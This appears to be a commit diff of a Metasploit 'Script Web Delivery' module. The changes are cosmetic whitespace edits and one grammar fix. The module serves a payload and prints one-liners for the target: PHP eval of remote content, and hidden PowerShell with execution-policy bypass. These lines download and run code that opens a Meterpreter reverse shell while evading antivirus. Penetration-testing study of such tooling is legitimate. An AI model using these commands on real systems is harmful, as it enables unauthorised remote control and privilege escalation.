@@ -12,35 +12,35 @@ class Metasploit3 < Msf::Exploit::Remote
12
12
13
13
def initialize ( info = { } )
14
14
super ( update_info ( info ,
15
- 'Name' => 'Script Web Delivery' ,
16
- 'Description' => %q{
15
+ 'Name' => 'Script Web Delivery' ,
16
+ 'Description' => %q{
17
17
This module quickly fires up a web server that serves a payload.
18
18
The provided command will start the specified scripting language interpreter and then download and execute the
19
19
payload. The main purpose of this module is to quickly establish a session on a target
20
20
machine when the attacker has to manually type in the command himself, e.g. Command Injection,
21
21
RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
22
- write to disk so is less likely to trigger AV solutions and will allow privilege
22
+ write to disk so it is less likely to trigger AV solutions and will allow privilege
23
23
escalations supplied by Meterpreter.
24
24
} ,
25
- 'License' => MSF_LICENSE ,
26
- 'Author' =>
25
+ 'License' => MSF_LICENSE ,
26
+ 'Author' =>
27
27
[
28
28
'Andrew Smith "jakx" <[email protected] >' ,
29
29
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ,
30
30
'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
31
31
] ,
32
32
'DefaultOptions' =>
33
33
{
34
- 'Payload' => 'python/meterpreter/reverse_tcp'
34
+ 'Payload' => 'python/meterpreter/reverse_tcp'
35
35
} ,
36
- 'References' =>
36
+ 'References' =>
37
37
[
38
38
[ 'URL' , 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html' ] ,
39
39
[ 'URL' , 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ] ,
40
40
[ 'URL' , 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/' ] ,
41
41
[ 'URL' , 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html' ]
42
42
] ,
43
- 'Platform' => %w{ python php win } ,
43
+ 'Platform' => %w{ python php win } ,
44
44
'Targets' =>
45
45
[
46
46
[ 'Python' , {
@@ -62,8 +62,8 @@ def initialize(info = {})
62
62
] ,
63
63
'DefaultTarget' => 0 ,
64
64
'DisclosureDate' => 'Jul 19 2013'
65
- ) )
66
- end
65
+ ) )
66
+ end
67
67
68
68
def on_request_uri ( cli , request )
69
69
print_status ( "Delivering Payload" )
@@ -78,7 +78,7 @@ def on_request_uri(cli, request)
78
78
def primer
79
79
url = get_uri ( )
80
80
print_status ( "Run the following command on the target machine:" )
81
- case target . name
81
+ case target . name
82
82
when "PHP"
83
83
print_line ( "php -d allow_url_fopen=true -r \" eval(file_get_contents('#{ url } '));\" " )
84
84
when "Python"
@@ -88,4 +88,4 @@ def primer
88
88
print_line ( "powershell.exe -w hidden -nop -ep bypass -c \" #{ download_and_run } \" " )
89
89
end
90
90
end
91
- end
91
+ end
0 commit comments